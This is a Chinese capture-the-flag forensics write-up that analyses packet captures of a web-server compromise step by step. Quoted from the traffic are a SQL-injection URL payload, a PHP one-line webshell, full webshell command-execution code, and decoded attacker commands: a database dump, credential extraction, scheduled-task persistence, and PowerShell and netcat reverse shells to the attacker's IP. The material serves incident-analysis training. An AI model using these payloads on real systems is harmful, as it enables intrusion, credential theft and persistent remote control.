陇剑杯 省赛 攻击者1
题目
链接:https://pan.baidu.com/s/1KSSXOVNPC5hu_Mf60uKM2A?pwd=haek
提取码:haek
├───LogAnalize
│ ├───linux简单日志分析
│ │ linux-log_2.zip
│ │
│ ├───misc日志分析
│ │ access.log
│ │
│ ├───misc简单日志分析
│ │ app.log
│ │
│ ├───sql注入分析
│ │ SQL.zip
│ │
│ └───windows日志分析
│ security-testlog_2.zip
│
├───ProvinceAttacker
│ └───pcap
│ 01 Web.pcapng
│ 02 DC.pcapng
│ 02 Web-ToInternet.pcapng
│ 02 Web-ToIntranet.pcapng
│ 03 Web.pcapng
│ pcap.zip
│
└───TrafficAnalize├───ios│ ios.zip│└───webshellhack.pcap
本文题目在ProvinceAttacker中,01 Web.pcapng
攻击者 1
1-1
分析主机及流量,提交第一个成功Getshell的攻击者IP地址。
flag
10.11.43.4
看一下post包
看到恶意url请求
[truncated]POST /admin/login.php?action=ck_login&BGol=8278%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%
url解出
[truncated]POST /admin/login.php?action=ck_login&BGol=8278 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**%
是个xss攻击
1-2
提交Web应用访问日志的名称及绝对路径,如:C:\log.txt。
本题在没在线虚拟机的情况下没法直接做
路径为C盘,phpstudy(大于2020)新版安装下的apache默认访问日志路径
这题爆0,乐了
1-3
第一个攻击者获取到了后台登录密码,请提交攻击者通过sql注入获取到的后台登录密码。
flag
admin123
使用wireshark过滤语句
http.request.method == "POST" and http contains "login"
找到包含登录信息的包
前面的数据包是一些盲注
最后黑客将在login.php中登录,直接看黑客输的密码是即可
1-4
第一个攻击者成功登录后台,请提交攻击者成功登录后台后访问到管理员面板的时间,以系统时间(UTC +8)为准,如:01/Dec/2021:12:00:01。
注意时区,UTC+8时区
flag
23/Dec/2021:19:25:56
菜单设置中改一下时间显示格式
我对这个flag有疑问
54秒发登录包,密码输入正确admin123
55秒回包302
55秒请求admin.php
57秒响应html
这个应当是小误差,就当是56秒吧
网络传输有时间差,具体情况具体分析
1-5
第一个攻击者了利用文件上传漏洞,上传了Webshell,请提交第一个攻击者上传的Webshell的文件的MD5值。
138683 2021-12-23 19:27:44.072126 10.11.43.4 10.20.24.62 HTTP 377 POST /upload/img/202112231926441247.php HTTP/1.1 (application/x-www-form-urlencoded)
后续的post操作集中在/upload/img/202112231926441247.php中,推测有马
包138683在wireshark中info显示有(image/png),推测这应该是黑客上传的webshell
导出分组字节流
在.bin字节流文件中看到了马`<?php @eval($_REQUEST[1]);?>
将多余的内容删掉,留下的内容如图(要加个回车,这个文件有两行)
windows中用 certutil -hashfile <filename> md5
算出文件的md5值
MD5 hash of ma.bin:
1f5a9c2a32aabe76a8442777657a1cf9
CertUtil: -hashfile command completed successfully.
flag
1f5a9c2a32aabe76a8442777657a1cf9
1-6
第一个攻击者访问了敏感文件,得到MySQL数据库的密码。请提交攻击者访问的敏感文件的文件名,如:1.php
配置文件.ini一般有账号密码等信息。直接搜.ini文件找不到,因为参数中观察到的编码为base64,黑客通过对post参数的url解码,然后执行命令
在数据包
140290 2021-12-23 19:27:58.182000 10.11.43.4 10.20.24.62 HTTP 89 POST /upload/img/202112231926441247.php HTTP/1.1 (application/x-www-form-urlencoded)
中 post 体 中的参数是有趣的
HTML Form URL Encoded: application/x-www-form-urlencoded[truncated]Form item: "1" = "@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\|\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".c8a6ec5f3c";@mkdir($tmdiForm item: "x67fff8f606c8b" = "OvQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS9jb25maW5nLnBocA=="
黑客写入的代码是
@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {$oparr = preg_split("/\\\\|\//", $opdir);$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir = ".c8a6ec5f3c";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");for ($i = 0; $i < sizeof($oparr); $i++) {@chdir("..");}@ini_set("open_basedir", "/");@rmdir($ocwd."/".$tmdir);
};function asenc($out) {return $out;
};function asoutput() {$output = ob_get_contents();ob_end_clean();echo "d39c0"."afca3";echo@ asenc($output);echo "d27c"."6600";
}
ob_start();
try {$F = base64_decode(substr($_POST["x67fff8f606c8b"], 2));$P = @fopen($F, "r");echo(@fread($P, filesize($F) ? filesize($F) : 4096));@fclose($P);;
} catch (Exception $e) {echo "ERROR://".$e - > getMessage();
};
asoutput();
die();
不难看出$F = base64_decode(substr($_POST["x67fff8f606c8b"], 2))
,对键x67fff8f606c8b
的值去掉前两位后进行base64解码
解出
C:/Program Files/phpstudy/PHPTutorial/WWW/data/confing.php
config.php为配置文件,mysql密码应当就写在其中吧
flag
confing.php
1-7
第一个攻击者在获取到数据库口令后,对数据库进行了拖库。请提交攻击者拖库数据库的名称。
观察数据包
146520 2021-12-23 19:28:52.059518 10.11.43.4 10.20.24.62 HTTP 766 POST /upload/img/202112231926441247.php HTTP/1.1 (application/x-www-form-urlencoded)
黑客写了一段代码
@
ini_set("display_errors", "0");@
set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {$oparr = preg_split("/\\\\|\//", $opdir);$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir = ".278c68b";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");for ($i = 0; $i < sizeof($oparr); $i++) {@chdir("..");}@ini_set("open_basedir", "/");@rmdir($ocwd."/".$tmdir);
};function asenc($out) {return $out;
};function asoutput() {$output = ob_get_contents();ob_end_clean();echo "2fb96"."62ed12";echo@ asenc($output);echo "edc2c"."13c82";
}
ob_start();
try {$f = base64_decode(substr($_POST["oe6306e1fc193"], 2));$c = $_POST["b91f2c6a32d6e7"];$c = str_replace("\r", "", $c);$c = str_replace("\n", "", $c);$buf = "";for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode("%".substr($c, $i, 2));echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {echo "ERROR://".$e - > getMessage();
};
asoutput();
die();
对post体中的键oe6306e1fc193截断前两位,做base64解码
Value: dvQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vdXBkYXRlLnNxbA==
解出
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/update.sql
推测黑客进行了数据库操作
另一个键b91f2c6a32d6e7的值看起来不像base64,而在代码中它是直接运算的,考虑它的加密方式是hex(十六进制)
Value [truncated]: 75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D69
完整值
75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D696E292077686572652069643D313B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E63617428757365722C2720272C2070617373776F7264292066726F6D206D7973716C2E75736572292077686572652069643D323B
hex解码
use bees;
update bees_article set content=(select group_concat(admin_name,' ', admin_password) from bees_admin) where id=1;
update bees_article set content=(select group_concat(user,' ', password) from mysql.user) where id=2;
mysql在命令行中操作use <数据库>
黑客对bees数据库拖库
flag
bees
1-8
第一个攻击者上传了文件用于创建反弹shell,请还原该文件并提交该文件的MD5值。
这题没解出来,跳过
1-9
第一个攻击者利用工具反弹shell,请提交回连的端口。
在包中
227682 2021-12-23 19:41:41.849164 10.11.43.4 10.20.24.62 HTTP 636 POST /upload/img/202112231926441247.php HTTP/1.1 (application/x-www-form-urlencoded)
黑客写入代码
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$oparr=preg_split("/\\\\|\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".429d4";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for ($i=0;$i<sizeof($oparr);$i++) {@chdir("..");}@ini_set("open_basedir","/");@rmdir($ocwd."/".$tmdir);
}
;
function asenc($out) {return $out;
}
;
function asoutput() {$output=ob_get_contents();ob_end_clean();echo "7a5d"."bc377";echo @asenc($output);echo "cff"."cb78";
}
ob_start();
try {$p=base64_decode(substr($_POST["q52db3dce849a"],2));$s=base64_decode(substr($_POST["za724065ab2aa8"],2));$envstr=@base64_decode(substr($_POST["v4ddc5d989f9d5"],2));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/") {@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");} else {@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)) {$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f) {$d=explode(",",@ini_get("disable_functions"));if(empty($d)) {$d=array();} else {$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("a@127.0.0.1", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c) {$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')) {@system($c,$ret);} elseif(fe('passthru')) {@passthru($c,$ret);} elseif(fe('shell_exec')) {print(@shell_exec($c));} elseif(fe('exec')) {@exec($c,$o,$ret);print(join("
",$o));} elseif(fe('popen')) {$fp=@popen($c,'r');while(!@feof($fp)) {print(@fgets($fp,2048));}@pclose($fp);} elseif(fe('proc_open')) {$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])) {print(@fgets($io[1],2048));}while(!@feof($io[2])) {print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);} elseif(fe('antsystem')) {@antsystem($c);} elseif(runshellshock($d, $c)) {return $ret;} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);} else {$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;
}
catch(Exception $e) {echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
CfY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzIiZuYzY0LmV4ZSAxMC4xMS40My40IDU2NzggLWUgYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlJmVjaG8gNTcyNWZmNmU5JmNkJmVjaG8gOTlhMDdlYjg=
解出
cd /d "C:\\Program Files"&nc64.exe 10.11.43.4 5678 -e c:\windows\system32\cmd.exe&echo 5725ff6e9&cd&echo 99a07eb8
端口为5678,这是nc64.exe的使用
flag
5678
1-10
第一个攻击者为了持续获得敏感数据,在系统中留下了持久化项,请提交该项的具体名称,如:persistence。
这题没解出来
未解决的疑问
在第五题
第一个攻击者了利用文件上传漏洞,上传了Webshell,请提交第一个攻击者上传的Webshell的文件的MD5值。
getshell用的是一句话木马,为啥要在马后面加个回车?
考虑出题者出题时的写文件习惯
文件内容不同,算出的md5也就不同
随手的记录
边看边解
黑客执行命令的记录
这部分不重要,不用看
139039
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvdXBsb2FkL2ltZy8=
C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img/139279
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvdXBsb2FkLw==
C:/Program Files/phpstudy/PHPTutorial/WWW/upload/139435
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cv
C:/Program Files/phpstudy/PHPTutorial/WWW/139827
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS8=
C:/Program Files/phpstudy/PHPTutorial/WWW/data/140290
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9XV1cvZGF0YS9jb25maW5nLnBocA==
C:/Program Files/phpstudy/PHPTutorial/WWW/data/confing.phpthis is a flagchange key140974
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC8=
C:/Program Files/phpstudy/PHPTutorial/141174
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC8=
C:/Program Files/phpstudy/PHPTutorial/MySQL/141491
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4v
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/141655
Y2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3VwbG9hZC9pbWciJmNkIEM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvTXlTUUwvYmluLyZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img"&cd C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/&echo 0273924&cd&echo bc6d88e68cmd143282
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJm15c3FsZHVtcC5leGUgLXVyb290IC1wcm9vdCBiZWVzID4gYmFjay5zcWwmZWNobyAwMjczOTI0JmNkJmVjaG8gYmM2ZDg4ZTY4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&mysqldump.exe -uroot -proot bees > back.sql&echo 0273924&cd&echo bc6d88e68143754
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmRpciZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&dir&echo 0273924&cd&echo bc6d88e68144181145025
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vYmFjay5zcWw=
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/back.sql146520
QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4vdXBkYXRlLnNxbA==
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/update.sql75736520626565733B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E6361742861646D696E5F6E616D652C2720272C2061646D696E5F70617373776F7264292066726F6D20626565735F61646D696E292077686572652069643D313B0D0A75706461746520626565735F61727469636C652073657420636F6E74656E743D2873656C6563742067726F75705F636F6E63617428757365722C2720272C2070617373776F7264292066726F6D206D7973716C2E75736572292077686572652069643D323B
use bees;
update bees_article set content=(select group_concat(admin_name,' ', admin_password) from bees_admin) where id=1;
update bees_article set content=(select group_concat(user,' ', password) from mysql.user) where id=2;this is a flagtry to get fasterValue: AkQzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeS9QSFBUdXRvcmlhbC9NeVNRTC9iaW4v
C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/Value: JAY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmRpciZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&dir&echo 0273924&cd&echo bc6d88e68Value: aIY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJm15c3FsLmV4ZSAtdXJvb3QgLXByb290IDwgdXBkYXRlLnNxbCZlY2hvIDAyNzM5MjQmY2QmZWNobyBiYzZkODhlNjg=
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&mysql.exe -uroot -proot < update.sql&echo 0273924&cd&echo bc6d88e68Value [truncated]: fuY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9jcmVhdGUgL3RuIFVwZGF0ZVNRTCAvdHIgIiJDOi9Qcm9ncmFtIEZpbGVzL3BocHN0dWR5L1BIUFR1dG9yaWFsL015U1FML2Jpbi9teXNxbC5leGUiIC11cm9vdCValue: pwY2QgL2QgInJldD0xIiY7JmVjaG8gMDI3MzkyNCZjZCZlY2hvIGJjNmQ4OGU2OA==
cd /d "ret=1"&;&echo 0273924&cd&echo bc6d88e68Value: d7Y2QgL2QgIkM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3VwbG9hZC9pbWciJmNkIEM6L1Byb2dyYW0gRmlsZXMvcGhwc3R1ZHkvUEhQVHV0b3JpYWwvTXlTUUwvYmluLyZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:/Program Files/phpstudy/PHPTutorial/WWW/upload/img"&cd C:/Program Files/phpstudy/PHPTutorial/MySQL/bin/&echo 5725ff6e9&cd&echo 99a07eb8Value: OWY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9xdWVyeSZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&schtasks /query&echo 5725ff6e9&cd&echo 99a07eb8Value: A1Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJmNoY3AgNjUwMDEmZWNobyA1NzI1ZmY2ZTkmY2QmZWNobyA5OWEwN2ViOA==
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&chcp 65001&echo 5725ff6e9&cd&echo 99a07eb8Value: K9Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnNjaHRhc2tzIC9xdWVyeSZlY2hvIDU3MjVmZjZlOSZjZCZlY2hvIDk5YTA3ZWI4
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&schtasks /query&echo 5725ff6e9&cd&echo 99a07eb8178849 2021-12-23 19:33:47.048736 10.11.43.4 10.20.24.62 HTTP 1302 POST /upload/img/202112231926441247.php HTTP/1.1 (application/x-www-form-urlencoded)
Value [truncated]: MMY2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeVxcUEhQVHV0b3JpYWxcXE15U1FMXFxiaW4iJnBvd2Vyc2hlbGwgLW5vcCAtYyAiJGNsaWVudCA9IE5ldy1PYmplY3QgTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxMC4xMS40My40Jyw1Njc4KTskc3RyZWFtID0gJGNsaWVudC5HZX
cd /d "C:\\Program Files\\phpstudy\\PHPTutorial\\MySQL\\bin"&powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('10.11.43.4',5678);$sValue: P0QzovUHJvZ3JhbSBGaWxlcy8=
C:/Program Files/216872216872
Value: 5CQzovUHJvZ3JhbSBGaWxlcy9uYzY0LmV4ZQ==
C:/Program Files/nc64.exe227682
Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzIiZuYzY0LmV4ZSAxMC4xMS40My40IDU2NzggLWUgYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlJmVjaG8gNTcyNWZmNmU5JmNkJmVjaG8gOTlhMDdlYjg=cd /d "C:\\Program Files"&nc64.exe 10.11.43.4 5678 -e c:\windows\system32\cmd.exe&echo 5725ff6e9&cd&echo 99a07eb8this is a flagadmin_pic_upload.php%3ftype=radio&get=thumb